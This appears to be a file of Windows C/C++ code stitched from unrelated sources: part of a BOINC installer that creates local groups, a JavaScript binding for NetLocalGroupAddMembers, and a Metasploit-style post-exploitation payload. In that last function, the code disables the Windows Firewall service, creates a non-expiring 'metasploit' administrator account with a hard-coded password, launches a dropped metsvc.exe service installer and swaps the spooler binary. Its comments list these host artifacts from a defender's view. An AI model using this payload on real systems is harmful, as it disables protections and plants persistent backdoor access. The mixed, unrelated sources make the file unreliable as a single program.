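        );
        goto cleanup;
    }

    if (NERR_Success == nasReturnValue) {
        bBOINCProjectsCreated = TRUE;
    }

    // If the user has enabled protected application execution then we need to add the 'boinc_project'
    // account to the local group and the 'Users' local group. As an aside 'boinc_master' is also added
    // to the 'Users' group.
    if (bProtectedExecution) {
        lgrmiMember.lgrmi0_sid = pBOINCProjectSID;

        nasReturnValue = NetLocalGroupAddMembers(
            NULL,
            _T("boinc_projects"),
            0,
            (LPBYTE)&lgrmiMember,
            1
        );

        if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
            LogMessage(
                INSTALLMESSAGE_INFO,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("NetLocalGroupAddMembers retval")
            );
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("Failed to add user to the 'boinc_projects' group (boinc_project).")
            );
            goto cleanup;
        }

        nasReturnValue = NetLocalGroupAddMembers(
            NULL,
            strUsersGroupName.c_str(),
            0,
            (LPBYTE)&lgrmiMember,
            1
        );

        if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
            LogMessage(
                INSTALLMESSAGE_INFO,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("NetLocalGroupAddMembers retval")
            );
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("Failed to add user to the 'Users' group (boinc_project).")
            );
            goto cleanup;
        }

        lgrmiMember.lgrmi0_sid = pBOINCMasterSID;

        nasReturnValue = NetLocalGroupAddMembers(
            NULL,
            strUsersGroupName.c_str(),
            0,
            (LPBYTE)&lgrmiMember,
            1
        );

        if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
            LogMessage(
                INSTALLMESSAGE_INFO,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("NetLocalGroupAddMembers retval")
            );
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("Failed to add user to the 'Users' group (boinc_master).")
            );
            goto cleanup;
        }
    }

    SetProperty( _T("BOINC_ADMINS_GROUPNAME"), _T("boinc_admins") );
    SetProperty( _T("BOINC_USERS_GROUPNAME"), _T("boinc_users") );
    SetProperty( _T("BOINC_PROJECTS_GROUPNAME"), _T("boinc_projects") );

    // Newly created groups are only visible to logon sessions started after
    // their creation, hence the reboot.
    if (bBOINCAdminsCreated || bBOINCUsersCreated || bBOINCProjectsCreated) {
        RebootWhenFinished();
    }

    uiReturnValue = ERROR_SUCCESS;

cleanup:
    // AllocateAndInitializeSid -> FreeSid
    if(pAdminSID != NULL) FreeSid(pAdminSID);
    // ConvertStringSidToSid allocates with LocalAlloc; LocalFree is the
    // documented release (the original used FreeSid here).
    if(pInstallingUserSID != NULL) LocalFree(pInstallingUserSID);
    // GetAccountSid is a project helper; FreeSid kept as the original did it --
    // TODO confirm against its allocation in this project.
    if(pBOINCMasterSID != NULL) FreeSid(pBOINCMasterSID);
    if(pBOINCProjectSID != NULL) FreeSid(pBOINCProjectSID);

    return uiReturnValue;
}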
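/*
 * netlocalgroupaddmembers(groupName, members) -> [status, ...]
 *
 * JS binding for NetLocalGroupAddMembers at information level 0 (members
 * given as SIDs).  argv[0] is the local group name; argv[1] is either a single
 * account name string or an array of them.  Each name is resolved to a SID
 * with convert_jsstring_to_sid(); a name whose lookup fails keeps that lookup
 * error and is not passed to the API.  The result placed in *rval is a JS
 * array with one NET_API_STATUS / lookup error per member, in input order.
 *
 * Returns JS_FALSE (with the error already reported on cx) when fewer than
 * two arguments are given, when a value cannot be converted to a string or
 * object, when the result array cannot be built, or when a heap allocation
 * fails.  All heap memory is released on every path.
 */
JSBool netlocalgroupaddmembers(JSContext * cx, JSObject * obj, uintN argc, jsval * argv, jsval * rval)
{
    LOCALGROUP_MEMBERS_INFO_0 * members = NULL;
    DWORD * lookupResult = NULL;
    DWORD memberCount = 0;
    DWORD i;
    JSString * groupName = NULL;
    JSObject * memberArray = NULL;     /* non-NULL when argv[1] is an array */
    JSString * memberString = NULL;    /* used when argv[1] is a single name */
    JSObject * retArray = NULL;
    JSBool ok = JS_FALSE;

    JS_BeginRequest(cx);

    if(argc < 2) {
        JS_ReportError(cx, "Must pass members to be added.");
        goto done;
    }

    groupName = JS_ValueToString(cx, argv[0]);
    if(groupName == NULL) {
        goto done;   /* conversion failure is already reported on cx */
    }
    /* store the converted values back into argv so they stay GC-rooted */
    argv[0] = STRING_TO_JSVAL(groupName);

    if(JSVAL_IS_OBJECT(argv[1]) && JS_IsArrayObject(cx, JSVAL_TO_OBJECT(argv[1]))) {
        if(!JS_ValueToObject(cx, argv[1], &memberArray) || memberArray == NULL) {
            goto done;
        }
        argv[1] = OBJECT_TO_JSVAL(memberArray);
        if(!JS_GetArrayLength(cx, memberArray, (jsuint*)&memberCount)) {
            goto done;
        }
    } else {
        memberString = JS_ValueToString(cx, argv[1]);
        if(memberString == NULL) {
            goto done;
        }
        argv[1] = STRING_TO_JSVAL(memberString);
        memberCount = 1;
    }

    /* memberCount comes from script; keep the allocation size from wrapping */
    if(memberCount > ((size_t)-1) / sizeof(LOCALGROUP_MEMBERS_INFO_0)) {
        JS_ReportOutOfMemory(cx);
        goto done;
    }

    members = (LOCALGROUP_MEMBERS_INFO_0*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                                   sizeof(LOCALGROUP_MEMBERS_INFO_0) * memberCount);
    lookupResult = (DWORD*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                     sizeof(DWORD) * memberCount);
    if(members == NULL || lookupResult == NULL) {
        JS_ReportOutOfMemory(cx);
        goto done;
    }

    if(memberArray != NULL) {
        JS_EnterLocalRootScope(cx);
        for(i = 0; i < memberCount; i++) {
            jsval curMemberVal = JSVAL_VOID;
            JSString * curMemberString;

            if(!JS_GetElement(cx, memberArray, (jsint)i, &curMemberVal)) {
                JS_LeaveLocalRootScope(cx);
                goto done;
            }
            curMemberString = JS_ValueToString(cx, curMemberVal);
            if(curMemberString == NULL) {
                JS_LeaveLocalRootScope(cx);
                goto done;
            }
            members[i].lgrmi0_sid = convert_jsstring_to_sid(cx, curMemberString, &lookupResult[i]);
        }
        JS_LeaveLocalRootScope(cx);
    } else {
        members->lgrmi0_sid = convert_jsstring_to_sid(cx, memberString, lookupResult);
    }

    /* Only names that resolved (lookupResult == 0) are submitted, one call each
     * so every member gets its own status. */
    for(i = 0; i < memberCount; i++) {
        if(lookupResult[i] == 0) {
            JS_YieldRequest(cx);   /* let other threads run during the API call */
            lookupResult[i] = NetLocalGroupAddMembers(NULL, (LPWSTR)JS_GetStringChars(groupName),
                                                      0, (LPBYTE)&members[i], 1);
        }
    }

    retArray = JS_NewArrayObject(cx, 0, NULL);
    if(retArray == NULL) {
        goto done;
    }
    *rval = OBJECT_TO_JSVAL(retArray);   /* rooted via *rval from here on */

    for(i = 0; i < memberCount; i++) {
        jsval curResultVal;
        if(!JS_NewNumberValue(cx, lookupResult[i], &curResultVal)) {
            goto done;
        }
        if(!JS_DefineElement(cx, retArray, i, curResultVal, NULL, NULL, 0)) {
            goto done;
        }
    }

    ok = JS_TRUE;

done:
    if(members != NULL) {
        /* SIDs come from convert_jsstring_to_sid; unfilled slots are NULL
         * thanks to HEAP_ZERO_MEMORY */
        for(i = 0; i < memberCount; i++) {
            if(members[i].lgrmi0_sid != NULL) {
                HeapFree(GetProcessHeap(), 0, members[i].lgrmi0_sid);
            }
        }
        HeapFree(GetProcessHeap(), 0, members);
    }
    if(lookupResult != NULL) {
        HeapFree(GetProcessHeap(), 0, lookupResult);
    }
    JS_EndRequest(cx);
    return ok;
}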
/*
 * start: post-exploitation payload (Metasploit-style) executed once the
 * exploit has gained code execution on the host.
 *
 * From a defender's point of view the sequence below leaves these host
 * artifacts, each of which is auditable:
 *   - HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc\Start set to 4
 *     (SERVICE_DISABLED): the Windows Firewall service will not start again;
 *   - a new local user "metasploit" with a fixed, non-expiring password, added
 *     to the local "Administrators" group;
 *   - a service installed by launching a dropped "metsvc.exe" from System32
 *     (SysWOW64 when the WOW64 redirection export is present);
 *   - System32\spoolsv.exe restored from spoolsv.bak.exe with its owner set to
 *     LocalSystem, which implies the spooler binary had been replaced earlier
 *     in the exploit.
 */
void start(){
    //fix wow32-64 fsredir
    // Resolved dynamically so the binary still loads where the export is absent;
    // disabling redirection makes the System32 paths below hit the native dir.
    PVOID OldValue;
    Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress( GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection");
    if( disableWow ) disableWow(&OldValue);

    // All relative paths below are taken from the Windows directory
    char windowsPath[MAX_PATH];
    GetWindowsDirectoryA(windowsPath,MAX_PATH);
    SetCurrentDirectoryA(windowsPath);

    //turn off fw
    // Writes the firewall service's start type (4 == SERVICE_DISABLED) in the
    // 64-bit view of the registry; the return values are not checked.
    HKEY mkey;
    DWORD four = 4;
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc", 0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey);
    RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD));
    RegCloseKey(mkey);

    //add user
    // Local account creation (NetUserAdd level 1) followed, on success, by a
    // level-3 NetLocalGroupAddMembers into the local Administrators group.
    USER_INFO_1 userinfo;
    userinfo.usri1_name = L"metasploit";
    userinfo.usri1_password = L"p@SSw0rd!123456";
    userinfo.usri1_priv = USER_PRIV_USER;
    userinfo.usri1_home_dir = NULL;
    userinfo.usri1_comment = L"";
    userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD;
    userinfo.usri1_script_path = NULL;
    DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL);
    if(res == NERR_Success){
        LOCALGROUP_MEMBERS_INFO_3 lgmi3;
        lgmi3.lgrmi3_domainandname = userinfo.usri1_name;
        NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1);
    }

    //start metsvc
    // Zero the structs byte by byte (no memset), then run the dropped service
    // installer from the directory matching the process bitness.
    STARTUPINFOA strt;
    PROCESS_INFORMATION proci;
    for(int i = 0; i < sizeof(strt); i++) ((char*)&strt)[i]=0;
    for(int i = 0; i < sizeof(proci); i++) ((char*)&proci)[i]=0;
    if( disableWow )//if 64 bit
        CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
    else
        CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);

    //permissions, owner?
    // Set the owner of both spooler binaries to LocalSystem before the rename
    // below; the LocalAlloc'd SID is not released.
    DWORD sidSize = SECURITY_MAX_SID_SIZE;
    PSID ownersid = LocalAlloc(LMEM_FIXED,sidSize);
    CreateWellKnownSid(WinLocalSystemSid, NULL, ownersid, &sidSize);
    SetNamedSecurityInfoA("System32\\spoolsv.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);
    SetNamedSecurityInfoA("System32\\spoolsv.bak.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);

    //copy file back
    // Retries until the backup can be moved into place, deleting whatever sits
    // at spoolsv.exe between attempts (e.g. while the file is still in use).
    while(MoveFileA("System32\\spoolsv.bak.exe","System32\\spoolsv.exe") == 0){
        DeleteFileA("System32\\spoolsv.exe");
        Sleep(100);
    }

    //This can be added so fw disable takes effect immediately and this process exits
    /*/reboot
    HANDLE tokenh;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh);
    TOKEN_PRIVILEGES tkp, otkp;
    DWORD oldsize;
    tkp.PrivilegeCount = 1;
    LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid));
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize);
    ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);//*/
}